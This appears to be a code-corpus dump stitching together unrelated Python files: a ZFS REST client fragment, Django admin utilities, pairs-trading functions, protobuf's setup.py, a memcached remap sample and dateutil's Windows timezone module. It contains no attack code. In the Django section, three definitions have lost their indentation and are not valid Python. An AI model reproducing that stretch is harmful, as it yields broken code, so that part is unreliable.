        # urllib2 picks GET/POST on its own; force the requested verb.
        req.get_method = lambda: request
        maxreqretries = kwargs.get("maxreqretries", 10)
        retry = 0
        response = None
        LOG.debug('Request: %s %s' % (request, zfssaurl))
        LOG.debug('Out headers: %s' % out_hdrs)
        if body and body != '':
            LOG.debug('Body: %s' % body)
        # Retry loop: 503 (busy) is retried after a pause; 401/500 trigger
        # one re-authorization attempt per retry; other HTTP errors are
        # returned to the caller wrapped in a RestResult.
        while retry < maxreqretries:
            try:
                response = urllib2.urlopen(req, timeout=self.timeout)
            except urllib2.HTTPError as err:
                if err.code == httplib.NOT_FOUND:
                    LOG.debug('REST Not Found: %s' % err.code)
                else:
                    LOG.error(_LE('REST Not Available: %s') % err.code)
                if err.code == httplib.SERVICE_UNAVAILABLE and \
                   retry < maxreqretries:
                    retry += 1
                    time.sleep(1)
                    LOG.error(_LE('Server Busy retry request: %s') % retry)
                    continue
                if (err.code == httplib.UNAUTHORIZED or
                    err.code == httplib.INTERNAL_SERVER_ERROR) and \
                   '/access/v1' not in zfssaurl:
                    try:
                        LOG.error(_LE('Authorizing request: '
                                      '%(zfssaurl)s'
                                      'retry: %(retry)d .')
                                  % {'zfssaurl': zfssaurl,
                                     'retry': retry})
                        self._authorize()
                        req.add_header('x-auth-session',
                                       self.headers['x-auth-session'])
                    except RestClientError:
                        pass
                    retry += 1
                    time.sleep(1)
                    continue
                return RestResult(err=err)
            except urllib2.URLError as err:
                LOG.error(_LE('URLError: %s') % err.reason)
                raise RestClientError(-1, name="ERR_URLError",
                                      message=err.reason)
            break
        if response and response.getcode() == httplib.SERVICE_UNAVAILABLE and \
           retry >= maxreqretries:
            raise RestClientError(response.getcode(), name="ERR_HTTPError",
                                  message="REST Not Available: Disabled")
        return RestResult(response=response)
    def get(self, path, **kwargs):
        """Make an HTTP GET request
        :param path: Path to resource.
        """
        return self.request(path, "GET", **kwargs)
    def post(self, path, body="", **kwargs):
        """Make an HTTP POST request
        :param path: Path to resource.
        :param body: Post data content
        """
        return self.request(path, "POST", body, **kwargs)
    def put(self, path, body="", **kwargs):
        """Make an HTTP PUT request
        :param path: Path to resource.
        :param body: Put data content
        """
        return self.request(path, "PUT", body, **kwargs)
    def delete(self, path, **kwargs):
        """Make an HTTP DELETE request
        :param path: Path to resource that will be deleted.
        """
        return self.request(path, "DELETE", **kwargs)
    def head(self, path, **kwargs):
        """Make an HTTP HEAD request
        :param path: Path to resource.
        """
        return self.request(path, "HEAD", **kwargs)
| apache-2.0 |
kevintaw/django | django/contrib/admin/utils.py | 8 | 16637 | from __future__ import unicode_literals
import datetime
import decimal
from collections import defaultdict
from django.contrib.auth import get_permission_codename
from django.core.exceptions import FieldDoesNotExist
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.deletion import Collector
from django.db.models.sql.constants import QUERY_TERMS
from django.forms.forms import pretty_name
from django.utils import formats, six, timezone
from django.utils.encoding import force_str, force_text, smart_text
from django.utils.html import format_html
from django.utils.text import capfirst
from django.utils.translation import ungettext
def lookup_needs_distinct(opts, lookup_path):
    """
    Returns True if 'distinct()' should be used to query the given lookup path.

    opts is the Options (Meta) of the model the lookup starts from;
    lookup_path is a "field__field__..." string, possibly ending in a
    query term such as "exact" or "in".
    """
    lookup_fields = lookup_path.split('__')
    # Remove the last item of the lookup path if it is a query term
    if lookup_fields[-1] in QUERY_TERMS:
        lookup_fields = lookup_fields[:-1]
    # Now go through the fields (following all relations) and look for an m2m
    for field_name in lookup_fields:
        field = opts.get_field(field_name)
        if hasattr(field, 'get_path_info'):
            # This field is a relation, update opts to follow the relation
            path_info = field.get_path_info()
            opts = path_info[-1].to_opts
            if any(path.m2m for path in path_info):
                # This field is a m2m relation so we know we need to call distinct
                return True
    return False
def prepare_lookup_value(key, value):
    """
    Returns a lookup value prepared to be used in queryset filtering.
    """
    # A "__in" lookup takes a comma-separated list of values.
    if key.endswith('__in'):
        value = value.split(',')
    # A "__isnull" lookup is boolean: '', 'false' and '0' mean False,
    # anything else means True.
    if key.endswith('__isnull'):
        value = value.lower() not in ('', 'false', '0')
    return value
def quote(s):
    """
    Ensure that primary key values do not confuse the admin URLs by escaping
    any '/', '_' and ':' and similarly problematic characters.
    Similar to urllib.quote, except that the quoting is slightly different so
    that it doesn't get automatically unquoted by the Web browser.
    """
    if not isinstance(s, six.string_types):
        return s
    unsafe = """:/_#?;@&=+$,"[]<>%\\"""
    return ''.join('_%02X' % ord(ch) if ch in unsafe else ch for ch in s)
def unquote(s):
    """
    Undo the effects of quote(). Based heavily on urllib.unquote().
    """
    pieces = s.split('_')
    decoded = [pieces[0]]
    for piece in pieces[1:]:
        # Each piece after a '_' should start with two hex digits; if it
        # doesn't parse as hex, the underscore was a literal one.
        if len(piece) >= 2:
            try:
                decoded.append(chr(int(piece[:2], 16)) + piece[2:])
            except ValueError:
                decoded.append('_' + piece)
        else:
            decoded.append('_' + piece)
    return "".join(decoded)
def flatten(fields):
    """Return a list that flattens *fields* by exactly one level.

    Items that are lists or tuples are expanded in place; every other item
    is kept as-is.
    """
    result = []
    for item in fields:
        result.extend(item if isinstance(item, (list, tuple)) else (item,))
    return result
def flatten_fieldsets(fieldsets):
    """Returns a list of field names from an admin fieldsets structure."""
    names = []
    for _name, opts in fieldsets:
        names += flatten(opts['fields'])
    return names
def get_deleted_objects(objs, opts, user, admin_site, using):
    """
    Find all objects related to ``objs`` that should also be deleted. ``objs``
    must be a homogeneous iterable of objects (e.g. a QuerySet).
    Returns a nested list of strings suitable for display in the
    template with the ``unordered_list`` filter.
    """
    collector = NestedObjects(using=using)
    collector.collect(objs)
    perms_needed = set()
    def format_callback(obj):
        # Render one collected object: link to its admin change page when
        # it is registered with this admin site, and record any missing
        # delete permission in perms_needed.
        has_admin = obj.__class__ in admin_site._registry
        opts = obj._meta
        no_edit_link = '%s: %s' % (capfirst(opts.verbose_name),
                                   force_text(obj))
        if has_admin:
            try:
                admin_url = reverse('%s:%s_%s_change'
                                    % (admin_site.name,
                                       opts.app_label,
                                       opts.model_name),
                                    None, (quote(obj._get_pk_val()),))
            except NoReverseMatch:
                # Change url doesn't exist -- don't display link to edit
                return no_edit_link
            p = '%s.%s' % (opts.app_label,
                           get_permission_codename('delete', opts))
            if not user.has_perm(p):
                perms_needed.add(opts.verbose_name)
            # Display a link to the admin page.
            return format_html('{}: <a href="{}">{}</a>',
                               capfirst(opts.verbose_name),
                               admin_url,
                               obj)
        else:
            # Don't display link to edit, because it either has no
            # admin or is edited inline.
            return no_edit_link
    to_delete = collector.nested(format_callback)
    protected = [format_callback(obj) for obj in collector.protected]
    return to_delete, collector.model_count, perms_needed, protected
class NestedObjects(Collector):
    # Deletion collector that also records the "deleted because of" graph
    # so the confirmation page can show cascades as a nested list.
    def __init__(self, *args, **kwargs):
        super(NestedObjects, self).__init__(*args, **kwargs)
        self.edges = {}  # {from_instance: [to_instances]}
        self.protected = set()
        self.model_count = defaultdict(int)
    def add_edge(self, source, target):
        # Record that deleting `source` cascades to `target` (source may
        # be None for root objects).
        self.edges.setdefault(source, []).append(target)
    def collect(self, objs, source=None, source_attr=None, **kwargs):
        for obj in objs:
            if source_attr and not source_attr.endswith('+'):
                related_name = source_attr % {
                    'class': source._meta.model_name,
                    'app_label': source._meta.app_label,
                }
                self.add_edge(getattr(obj, related_name), obj)
            else:
                self.add_edge(None, obj)
            self.model_count[obj._meta.verbose_name_plural] += 1
        try:
            return super(NestedObjects, self).collect(objs, source_attr=source_attr, **kwargs)
        except models.ProtectedError as e:
            # PROTECT relations are reported, not deleted.
            self.protected.update(e.protected_objects)
    def related_objects(self, related, objs):
        qs = super(NestedObjects, self).related_objects(related, objs)
        return qs.select_related(related.field.name)
    def _nested(self, obj, seen, format_callback):
        # Depth-first render of obj and its cascade; `seen` guards against
        # cycles and duplicates.
        if obj in seen:
            return []
        seen.add(obj)
        children = []
        for child in self.edges.get(obj, ()):
            children.extend(self._nested(child, seen, format_callback))
        if format_callback:
            ret = [format_callback(obj)]
        else:
            ret = [obj]
        if children:
            ret.append(children)
        return ret
    def nested(self, format_callback=None):
        """
        Return the graph as a nested list.
        """
        seen = set()
        roots = []
        for root in self.edges.get(None, ()):
            roots.extend(self._nested(root, seen, format_callback))
        return roots
    def can_fast_delete(self, *args, **kwargs):
        """
        We always want to load the objects into memory so that we can display
        them to the user in confirm page.
        """
        return False
def model_format_dict(obj):
    """
    Return a `dict` with keys 'verbose_name' and 'verbose_name_plural',
    typically for use with string formatting.
    `obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
    """
    if isinstance(obj, (models.Model, models.base.ModelBase)):
        opts = obj._meta
    elif isinstance(obj, models.query.QuerySet):
        opts = obj.model._meta
    else:
        # Assume obj is already an Options instance.
        opts = obj
    return {
        'verbose_name': force_text(opts.verbose_name),
        'verbose_name_plural': force_text(opts.verbose_name_plural)
    }
def model_ngettext(obj, n=None):
    """
    Return the appropriate `verbose_name` or `verbose_name_plural` value for
    `obj` depending on the count `n`.
    `obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
    If `obj` is a `QuerySet` instance, `n` is optional and the length of the
    `QuerySet` is used.
    """
    if isinstance(obj, models.query.QuerySet):
        if n is None:
            n = obj.count()
        obj = obj.model
    d = model_format_dict(obj)
    singular, plural = d["verbose_name"], d["verbose_name_plural"]
    return ungettext(singular, plural, n or 0)
def lookup_field(name, obj, model_admin=None):
    """
    Resolve `name` against `obj` (and optionally `model_admin`).

    Returns a (field, attr, value) triple: `field` is the model field or
    None when `name` is not a field; `attr` is the callable/attribute used
    instead, or None when a field was found; `value` is the resolved value.
    """
    opts = obj._meta
    try:
        f = _get_non_gfk_field(opts, name)
    except FieldDoesNotExist:
        # For non-field values, the value is either a method, property or
        # returned via a callable.
        if callable(name):
            attr = name
            value = attr(obj)
        elif (model_admin is not None and
                hasattr(model_admin, name) and
                not name == '__str__' and
                not name == '__unicode__'):
            attr = getattr(model_admin, name)
            value = attr(obj)
        else:
            attr = getattr(obj, name)
            if callable(attr):
                value = attr()
            else:
                value = attr
        f = None
    else:
        attr = None
        value = getattr(obj, name)
    return f, attr, value
def _get_non_gfk_field(opts, name):
    """
    For historical reasons, the admin app relies on GenericForeignKeys as being
    "not found" by get_field(). This could likely be cleaned up.
    """
    field = opts.get_field(name)
    # A concrete-less many-to-one with no related model is how a
    # GenericForeignKey presents itself here.
    if field.is_relation and field.many_to_one and not field.related_model:
        raise FieldDoesNotExist()
    return field
def label_for_field(name, model, model_admin=None, return_attr=False):
    """
    Returns a sensible label for a field name. The name can be a callable,
    property (but not created with @property decorator) or the name of an
    object's attribute, as well as a genuine fields. If return_attr is
    True, the resolved attribute (which could be a callable) is also returned.
    This will be None if (and only if) the name refers to a field.
    """
    attr = None
    try:
        field = _get_non_gfk_field(model._meta, name)
        try:
            label = field.verbose_name
        except AttributeError:
            # field is likely a ForeignObjectRel
            label = field.related_model._meta.verbose_name
    except FieldDoesNotExist:
        if name == "__unicode__":
            label = force_text(model._meta.verbose_name)
            attr = six.text_type
        elif name == "__str__":
            label = force_str(model._meta.verbose_name)
            attr = bytes
        else:
            # Resolve the attribute: a callable, an admin attribute, or a
            # model attribute, in that order of precedence.
            if callable(name):
                attr = name
            elif model_admin is not None and hasattr(model_admin, name):
                attr = getattr(model_admin, name)
            elif hasattr(model, name):
                attr = getattr(model, name)
            else:
                message = "Unable to lookup '%s' on %s" % (name, model._meta.object_name)
                if model_admin:
                    message += " or %s" % (model_admin.__class__.__name__,)
                raise AttributeError(message)
            # Derive the label: explicit short_description wins, then a
            # prettified callable/attribute name.
            if hasattr(attr, "short_description"):
                label = attr.short_description
            elif (isinstance(attr, property) and
                  hasattr(attr, "fget") and
                  hasattr(attr.fget, "short_description")):
                label = attr.fget.short_description
            elif callable(attr):
                if attr.__name__ == "<lambda>":
                    label = "--"
                else:
                    label = pretty_name(attr.__name__)
            else:
                label = pretty_name(name)
    if return_attr:
        return (label, attr)
    else:
        return label
def help_text_for_field(name, model):
    # Return the field's help_text (as text), or "" when `name` is not a
    # real model field or has no help_text.
    help_text = ""
    try:
        field = _get_non_gfk_field(model._meta, name)
    except FieldDoesNotExist:
        pass
    else:
        if hasattr(field, 'help_text'):
            help_text = field.help_text
    return smart_text(help_text)
def display_for_field(value, field, empty_value_display):
    # Format `value` for the change list according to its model field type.
    from django.contrib.admin.templatetags.admin_list import _boolean_icon
    if field.flatchoices:
        return dict(field.flatchoices).get(value, empty_value_display)
    # NullBooleanField needs special-case null-handling, so it comes
    # before the general null test.
    elif isinstance(field, models.BooleanField) or isinstance(field, models.NullBooleanField):
        return _boolean_icon(value)
    elif value is None:
        return empty_value_display
    elif isinstance(field, models.DateTimeField):
        return formats.localize(timezone.template_localtime(value))
    elif isinstance(field, (models.DateField, models.TimeField)):
        return formats.localize(value)
    elif isinstance(field, models.DecimalField):
        return formats.number_format(value, field.decimal_places)
    elif isinstance(field, (models.IntegerField, models.FloatField)):
        return formats.number_format(value)
    elif isinstance(field, models.FileField) and value:
        return format_html('<a href="{}">{}</a>', value.url, value)
    else:
        return smart_text(value)
def display_for_value(value, empty_value_display, boolean=False):
    # Format a non-field `value` for the change list based on its type.
    from django.contrib.admin.templatetags.admin_list import _boolean_icon
    if boolean:
        return _boolean_icon(value)
    elif value is None:
        return empty_value_display
    elif isinstance(value, datetime.datetime):
        return formats.localize(timezone.template_localtime(value))
    elif isinstance(value, (datetime.date, datetime.time)):
        return formats.localize(value)
    elif isinstance(value, six.integer_types + (decimal.Decimal, float)):
        return formats.number_format(value)
    else:
        return smart_text(value)
class NotRelationField(Exception):
pass
def get_model_from_relation(field):
if hasattr(field, 'get_path_info'):
return field.get_path_info()[-1].to_opts.model
else:
raise NotRelationField
def reverse_field_path(model, path):
""" Create a reversed field path.
E.g. Given (Order, "user__groups"),
return (Group, "user__order").
Final field must be a related model, not a data field.
"""
reversed_path = []
parent = model
pieces = path.split(LOOKUP_SEP)
for piece in pieces:
field = parent._meta.get_field(piece)
# skip trailing data field if extant:
if len(reversed_path) == len(pieces) - 1: # final iteration
try:
get_model_from_relation(field)
except NotRelationField:
break
# Field should point to another model
if field.is_relation and not (field.auto_created and not field.concrete):
related_name = field.related_query_name()
parent = field.remote_field.model
else:
related_name = field.field.name
parent = field.related_model
reversed_path.insert(0, related_name)
return (parent, LOOKUP_SEP.join(reversed_path))
def get_fields_from_path(model, path):
    """Resolve a LOOKUP_SEP-joined ``path`` into the list of Field objects
    it traverses, starting from ``model``.

    Intermediate pieces must be relations (get_model_from_relation raises
    NotRelationField otherwise); the final piece may be a plain data field.
    """
    fields = []
    for piece in path.split(LOOKUP_SEP):
        # For the first piece look up on `model`; afterwards, descend into
        # the model the previous (relation) field points at.
        owner = model if not fields else get_model_from_relation(fields[-1])
        fields.append(owner._meta.get_field(piece))
    return fields
def remove_trailing_data_field(fields):
    """ Discard trailing non-relation field if extant. """
    try:
        # Only the exception matters; the resolved model is discarded.
        get_model_from_relation(fields[-1])
    except NotRelationField:
        return fields[:-1]
    return fields
| bsd-3-clause |
atpaino/stocktradinganalysis | pairstrading/classificationfns.py | 1 | 3642 | #Contains functions used to classify a proposed trade consisting of two HistoricData
#objects at a specific time as either successful (reverted to mean) or unsuccessful.
from singleseriesfns import *
from twoseriesfns import *
def bounded_roi(hd1, hd2, n=20, offset=20):
    """
    Calculates the average, bounded ROI for the proposed trade (assuming the symbol
    with the larger percent gain over offset+n:offset has been shorted).
    NOTE: offset must be greater than or equal to n
    """
    def pct_gain(hd):
        # Percent gain from bar offset+n (older) to bar offset (newer).
        base = hd.close[offset + n]
        return (hd.close[offset] - base) / base

    # Short the stronger recent performer, go long the weaker one.
    if pct_gain(hd1) > pct_gain(hd2):
        short_leg, long_leg = hd1, hd2
    else:
        short_leg, long_leg = hd2, hd1
    # ROI of the short leg over the subsequent n bars (profits on declines).
    roi_short = (short_leg.close[offset] - short_leg.close[offset - n]) / short_leg.close[offset]
    # ROI of the long leg over the same window (profits on gains).
    roi_long = (long_leg.close[offset - n] - long_leg.close[offset]) / long_leg.close[offset]
    # Average ROI scaled by 10 and squashed into (-1, 1):
    # tanh(10 * mean) == tanh(5 * (roi_short + roi_long)).
    return sp.tanh(5 * (roi_short + roi_long))
def winning_trade_test(hd1, hd2, n=20, offset=20):
    """
    Alternative to bounded_roi for determing class of trade.
    Returns 1 iff the shorted position decreased AND the long position increased.
    """
    # Percent gain over offset+n:offset picks which symbol would be shorted.
    pg1 = (hd1.close[offset] - hd1.close[offset + n]) / hd1.close[offset + n]
    pg2 = (hd2.close[offset] - hd2.close[offset + n]) / hd2.close[offset + n]
    short_leg, long_leg = (hd1, hd2) if pg1 > pg2 else (hd2, hd1)
    # Lower index == more recent bar, so a winning short has a higher close
    # at `offset` than at `offset - n`, and vice versa for the long leg.
    short_won = short_leg.close[offset] > short_leg.close[offset - n]
    long_won = long_leg.close[offset - n] > long_leg.close[offset]
    return 1 if short_won and long_won else 0
def mean_reversion_test(hd1, hd2, n=20, offset=20, hold_time=30, return_index=False):
    """
    Tests over the time period offset:offset-n to see if the pair reverts to the mean.
    Specifically, we are doing this by testing at each closing price in this time period
    to see if the long position is higher than its sma at the same time the short position
    is below its sma.
    Returns 1/0 for success/failure, or the bar index reached when
    return_index is True.
    """
    #Get short and long positions
    (short_pos, long_pos) = get_short_long(hd1, hd2, n, offset)
    #Calculate the simple moving average for each stock at time offset
    # NOTE(review): assumes sma() returns the n-period simple moving average
    # ending at `offset` -- confirm against singleseriesfns.
    short_sma = sma(short_pos, offset=offset)
    long_sma = sma(long_pos, offset=offset)
    # Walk forward in time (indices decrease toward the present) for up to
    # hold_time bars, stopping at the first bar where both legs have crossed
    # their moving averages.
    for i in xrange(offset, max(offset - hold_time, 0), -1):
        if short_pos.close[i] < short_sma and long_pos.close[i] > long_sma:
            if return_index:
                return i
            return 1
    #The pair has not reverted to the mean
    # (`i` holds the last index examined; the loop is non-empty for offset > 0)
    if return_index:
        return i
    return 0
def mean_ratio_reversion_test(hd1, hd2, n=20, offset=20, hold_time=30, return_index=False):
    """
    Tests over the time period offset:offset-hold_time to see if the price ratio of the
    price pair reverts to the mean.
    Returns 1 as soon as the hd1/hd2 ratio crosses its n-period mean within
    the holding window, else 0 (or the bar index when return_index is True).
    """
    #Get initial price ratio
    init_pr = hd1.close[offset] / hd2.close[offset]
    #Get mean for the pair
    pr_mean = mean_price_ratio(hd1, hd2, n=n, offset=offset)
    #Calculate coefficient to use to see if the price ratio switched sides of mean pr
    # coeff encodes which side of the mean we start on, so a crossing makes
    # coeff * (ratio - mean) change sign.
    coeff = 1 if init_pr > pr_mean else -1
    for i in xrange(offset, max(offset - hold_time, 0), -1):
        # Bug fix: the ratio at bar i must use hd2.close[i], not the frozen
        # hd2.close[offset] -- otherwise only hd1's movement was tested.
        if coeff * (hd1.close[i] / hd2.close[i] - pr_mean) < 0:
            if return_index:
                return i
            return 1
    #The pair has not reverted to the mean
    if return_index:
        return i
    return 0
| mit |
JCROM-Android/jcrom_external_chromium_org | third_party/protobuf/python/setup.py | 23 | 7723 | #! /usr/bin/python
#
# See README for usage instructions.
import sys
import os
import subprocess
# We must use setuptools, not distutils, because we need to use the
# namespace_packages option for the "google" package.
try:
from setuptools import setup, Extension
except ImportError:
try:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, Extension
except ImportError:
sys.stderr.write(
"Could not import setuptools; make sure you have setuptools or "
"ez_setup installed.\n")
raise
from distutils.command.clean import clean as _clean
from distutils.command.build_py import build_py as _build_py
from distutils.spawn import find_executable
maintainer_email = "protobuf@googlegroups.com"
# Find the Protocol Compiler.
# Prefer a freshly built compiler from the source tree (POSIX layout first,
# then the Windows build outputs); fall back to whatever `protoc` is on
# PATH. May resolve to None, which generate_proto() treats as fatal.
if os.path.exists("../src/protoc"):
  protoc = "../src/protoc"
elif os.path.exists("../src/protoc.exe"):
  protoc = "../src/protoc.exe"
elif os.path.exists("../vsprojects/Debug/protoc.exe"):
  protoc = "../vsprojects/Debug/protoc.exe"
elif os.path.exists("../vsprojects/Release/protoc.exe"):
  protoc = "../vsprojects/Release/protoc.exe"
else:
  protoc = find_executable("protoc")
def generate_proto(source):
"""Invokes the Protocol Compiler to generate a _pb2.py from the given
.proto file. Does nothing if the output already exists and is newer than
the input."""
output = source.replace(".proto", "_pb2.py").replace("../src/", "")
if (not os.path.exists(output) or
(os.path.exists(source) and
os.path.getmtime(source) > os.path.getmtime(output))):
print "Generating %s..." % output
if not os.path.exists(source):
sys.stderr.write("Can't find required file: %s\n" % source)
sys.exit(-1)
if protoc == None:
sys.stderr.write(
"protoc is not installed nor found in ../src. Please compile it "
"or install the binary package.\n")
sys.exit(-1)
protoc_command = [ protoc, "-I../src", "-I.", "--python_out=.", source ]
if subprocess.call(protoc_command) != 0:
sys.exit(-1)
def GenerateUnittestProtos():
  """Run the Protocol Compiler over every .proto used by the unit tests."""
  test_protos = [
      "../src/google/protobuf/unittest.proto",
      "../src/google/protobuf/unittest_custom_options.proto",
      "../src/google/protobuf/unittest_import.proto",
      "../src/google/protobuf/unittest_import_public.proto",
      "../src/google/protobuf/unittest_mset.proto",
      "../src/google/protobuf/unittest_no_generic_services.proto",
      "google/protobuf/internal/test_bad_identifiers.proto",
      "google/protobuf/internal/more_extensions.proto",
      "google/protobuf/internal/more_extensions_dynamic.proto",
      "google/protobuf/internal/more_messages.proto",
      "google/protobuf/internal/factory_test1.proto",
      "google/protobuf/internal/factory_test2.proto",
  ]
  for proto_file in test_protos:
    generate_proto(proto_file)
def MakeTestSuite():
  """Collect the protobuf unit-test modules into a unittest.TestSuite.
  Invoked by setuptools via the test_suite option passed to setup() below.
  """
  # This is apparently needed on some systems to make sure that the tests
  # work even if a previous version is already installed.
  if 'google' in sys.modules:
    del sys.modules['google']
  # The test modules import *_pb2 modules, so generate them first.
  GenerateUnittestProtos()
  import unittest
  import google.protobuf.internal.generator_test as generator_test
  import google.protobuf.internal.descriptor_test as descriptor_test
  import google.protobuf.internal.reflection_test as reflection_test
  import google.protobuf.internal.service_reflection_test \
      as service_reflection_test
  import google.protobuf.internal.text_format_test as text_format_test
  import google.protobuf.internal.wire_format_test as wire_format_test
  import google.protobuf.internal.unknown_fields_test as unknown_fields_test
  import google.protobuf.internal.descriptor_database_test \
      as descriptor_database_test
  import google.protobuf.internal.descriptor_pool_test as descriptor_pool_test
  import google.protobuf.internal.message_factory_test as message_factory_test
  import google.protobuf.internal.message_cpp_test as message_cpp_test
  import google.protobuf.internal.reflection_cpp_generated_test \
      as reflection_cpp_generated_test
  loader = unittest.defaultTestLoader
  suite = unittest.TestSuite()
  # NOTE(review): several modules imported above (unknown_fields_test,
  # descriptor_database/pool, message_factory and the cpp tests) are never
  # added to the suite -- presumably deliberate (optional C++ runtime);
  # confirm before relying on this suite for coverage.
  for test in [ generator_test,
                descriptor_test,
                reflection_test,
                service_reflection_test,
                text_format_test,
                wire_format_test ]:
    suite.addTest(loader.loadTestsFromModule(test))
  return suite
class clean(_clean):
  """distutils `clean` that also removes generated protobuf artifacts."""
  def run(self):
    # Delete generated files in the code tree.
    generated = ("_pb2.py", ".pyc", ".so", ".o",
                 'google/protobuf/compiler/__init__.py')
    for dirpath, dirnames, filenames in os.walk("."):
      for filename in filenames:
        filepath = os.path.join(dirpath, filename)
        # str.endswith accepts a tuple of suffixes, replacing the chained
        # `or` checks with a single call.
        if filepath.endswith(generated):
          os.remove(filepath)
    # _clean is an old-style class, so super() doesn't work.
    _clean.run(self)
class build_py(_build_py):
  """build_py that first generates all required *_pb2 modules."""
  def run(self):
    # Generate necessary .proto file if it doesn't exist.
    generate_proto("../src/google/protobuf/descriptor.proto")
    generate_proto("../src/google/protobuf/compiler/plugin.proto")
    GenerateUnittestProtos()
    # Make sure google.protobuf.compiler is a valid package.
    # (Opening in append mode creates the file without truncating it.)
    open('google/protobuf/compiler/__init__.py', 'a').close()
    # _build_py is an old-style class, so super() doesn't work.
    _build_py.run(self)
if __name__ == '__main__':
  ext_module_list = []
  # C++ implementation extension
  # Opt-in via PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=cpp; the default is
  # the pure-Python implementation.
  if os.getenv("PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION", "python") == "cpp":
    # NOTE(review): "Implmenetation" is misspelled in this user-facing
    # message -- fix upstream if touched.
    print "Using EXPERIMENTAL C++ Implmenetation."
    ext_module_list.append(Extension(
        "google.protobuf.internal._net_proto2___python",
        [ "google/protobuf/pyext/python_descriptor.cc",
          "google/protobuf/pyext/python_protobuf.cc",
          "google/protobuf/pyext/python-proto2.cc" ],
        include_dirs = [ "." ],
        libraries = [ "protobuf" ]))
  # NOTE(review): `maintainer` is set to the module-level email string
  # rather than a person's name -- confirm this is intentional.
  setup(name = 'protobuf',
        version = '2.4.2-pre',
        packages = [ 'google' ],
        namespace_packages = [ 'google' ],
        test_suite = 'setup.MakeTestSuite',
        # Must list modules explicitly so that we don't install tests.
        py_modules = [
          'google.protobuf.internal.api_implementation',
          'google.protobuf.internal.containers',
          'google.protobuf.internal.cpp_message',
          'google.protobuf.internal.decoder',
          'google.protobuf.internal.encoder',
          'google.protobuf.internal.message_listener',
          'google.protobuf.internal.python_message',
          'google.protobuf.internal.type_checkers',
          'google.protobuf.internal.wire_format',
          'google.protobuf.descriptor',
          'google.protobuf.descriptor_pb2',
          'google.protobuf.compiler.plugin_pb2',
          'google.protobuf.message',
          'google.protobuf.descriptor_database',
          'google.protobuf.descriptor_pool',
          'google.protobuf.message_factory',
          'google.protobuf.reflection',
          'google.protobuf.service',
          'google.protobuf.service_reflection',
          'google.protobuf.text_format' ],
        cmdclass = { 'clean': clean, 'build_py': build_py },
        install_requires = ['setuptools'],
        ext_modules = ext_module_list,
        url = 'http://code.google.com/p/protobuf/',
        maintainer = maintainer_email,
        maintainer_email = 'protobuf@googlegroups.com',
        license = 'New BSD License',
        description = 'Protocol Buffers',
        long_description =
          "Protocol Buffers are Google's data interchange format.",
        )
| bsd-3-clause |
chenglongwei/trafficserver | plugins/experimental/memcached_remap/sample.py | 1 | 1324 | #!/usr/bin/python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: opensource@navyaprabha.com
# Description: Sample script to add keys to memcached for use with YTS/memcached_remap plugin
import memcache
# connect to local server
mc = memcache.Client(['127.0.0.1:11211'], debug=0)
# Add couple of keys
# Each key is a request URL as seen by Traffic Server; the value is the
# origin URL the memcached_remap plugin should rewrite it to.
mc.set("http://127.0.0.1:80/", "http://127.0.0.1:8080");
mc.set("http://localhost:80/", "http://localhost:8080");
# Print the keys that are saved
print "response-1 is '%s'" %(mc.get("http://127.0.0.1:80/"))
print "response-2 is '%s'" %(mc.get("http://localhost:80/"))
| apache-2.0 |
sirchia/CouchPotatoServer | libs/dateutil/tzwin.py | 304 | 5828 | # This code was originally contributed by Jeffrey Harris.
import datetime
import struct
import _winreg
__author__ = "Jeffrey Harris & Gustavo Niemeyer <gustavo@niemeyer.net>"
__all__ = ["tzwin", "tzwinlocal"]
# One calendar week; used to step between weekday occurrences in a month.
ONEWEEK = datetime.timedelta(7)
# Registry locations of the time zone database on NT-based and 9x-based
# Windows, plus the key describing the currently configured local zone.
TZKEYNAMENT = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones"
TZKEYNAME9X = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Time Zones"
TZLOCALKEYNAME = r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
def _settzkeyname():
    """Set the module-global TZKEYNAME to whichever registry path exists.
    Probes the NT-style key first and falls back to the Windows 9x key.
    """
    global TZKEYNAME
    handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
    try:
        _winreg.OpenKey(handle, TZKEYNAMENT).Close()
        TZKEYNAME = TZKEYNAMENT
    except WindowsError:
        TZKEYNAME = TZKEYNAME9X
    handle.Close()
# Resolve TZKEYNAME once at import time.
_settzkeyname()
class tzwinbase(datetime.tzinfo):
    """tzinfo class based on win32's timezones available in the registry.

    Subclasses must populate the _std*/_dst* attributes (offsets in minutes,
    names, and the month/dayofweek/weeknumber/hour/minute transition rules)
    before use; see tzwin and tzwinlocal below.
    """
    def utcoffset(self, dt):
        # Total offset from UTC in minutes, DST-adjusted.
        if self._isdst(dt):
            return datetime.timedelta(minutes=self._dstoffset)
        else:
            return datetime.timedelta(minutes=self._stdoffset)
    def dst(self, dt):
        # DST adjustment only (zero outside the DST window).
        if self._isdst(dt):
            minutes = self._dstoffset - self._stdoffset
            return datetime.timedelta(minutes=minutes)
        else:
            return datetime.timedelta(0)
    def tzname(self, dt):
        if self._isdst(dt):
            return self._dstname
        else:
            return self._stdname
    def list():
        """Return a list of all time zones known to the system."""
        handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
        tzkey = _winreg.OpenKey(handle, TZKEYNAME)
        result = [_winreg.EnumKey(tzkey, i)
                  for i in range(_winreg.QueryInfoKey(tzkey)[0])]
        tzkey.Close()
        handle.Close()
        return result
    # Pre-decorator staticmethod idiom (kept for old-Python compatibility).
    list = staticmethod(list)
    def display(self):
        # Human-readable zone description from the registry.
        return self._display
